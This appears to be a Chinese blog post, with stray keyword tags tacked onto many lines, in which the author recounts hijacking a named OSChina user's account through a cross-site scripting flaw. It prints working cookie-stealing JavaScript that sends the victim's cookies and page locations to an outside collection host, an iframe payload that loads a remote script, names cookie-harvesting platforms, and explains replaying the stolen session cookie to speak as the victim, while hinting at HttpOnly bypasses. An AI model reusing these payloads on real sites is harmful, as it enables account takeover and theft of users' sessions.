首先,先道歉..讓@鉑金小豬 成爲了受害用戶...當了我兒子一天...如今@Soga @皮總 大家知道那天是怎麼回事了吧。。javascript
其實今天要講的是Xss(Cross Site Scripting)的一種利用方式:劫持用戶帳號html
首先須要找到OSChina存在xss注入的地方。:)這裏先隱藏。。等@紅薯 修復。。。前端
而後再將帶有XSS的url(我使用了google的短連接包裝了一下)發給受害者@鉑金小豬 。java
而後讓oschina充滿養豬廣告的妹紙@鉑金小豬 哭了:web
不信的話,你們如今還能夠去看@鉑金小豬 空間左側的簽名chrome
其實xss你們搜搜下就知道怎麼利用了。。可是劫持帳戶上。你們可能以爲有兩個難點..我在這裏教你們。。cookie
1.若是收到被害者的cookie.網絡
其實能夠在本身網站上作一個腳原本進行cookie收集。。。也能夠用第三方的cookie收集平臺。。app
好比xsser.me或者xss.la等。這兩個平臺都是禁止註冊的。。本身寫一個就好.很簡單xss
熟悉javascript,簡單看下別人偷cookie的代碼。。就明白是怎麼回事了
var x=new Image(); try { var myopener=''; myopener=window.opener && window.opener.location ? window.opener.location : ''; } catch(err) { } x.src='http://xssapp.com/accept.aspx?id=@pid&location='+escape(document.location)+'&toplocation='+escape(top.document.location)+'&cookie='+escape(document.cookie)+'&opener='+escape(myopener); self.location="http://my.oschina.net/samshuai";
上面是個人xss javascript代碼。。。
再發個別人的一個利用方式:
<iframe onload="this.src='xss 地址+<script src =tmxk.Org/0.js>'" style="display:none"></iframe>
2.得到cookie以後,如何使用?
其實firefox和chrome都有插件能夠完成這個功能。直接替換上@鉑金小豬 的oscid就能夠用他的帳號說話了。。
我用的是firefox的web developer toolbar:
@紅薯 兼職就是聰明絕頂啊。。。這兩天他搗鼓了一個Java EE 6.0 的 Cookie 類已經有設置 HttpOnly 的方法。。
其實使用httponly也是一種防止cookie被盜和被修改的方法。。主要讓document.cookie不起做用。這真的能防止cookie被盜麼???我笑了。。。。。你們能夠說下繼續利用的方式。。看看和個人繞過httponly方法是否一致。個人方法裏面包裹document.xxx你們想一想吧。。。
還有就是使用了httponly真的不能使用工具修改本身的cookie了麼??也是有極其淫蕩的方式的。。。你們也能夠說說。
擴展閱讀:
網絡攻擊技術(二)——Cross-site scripting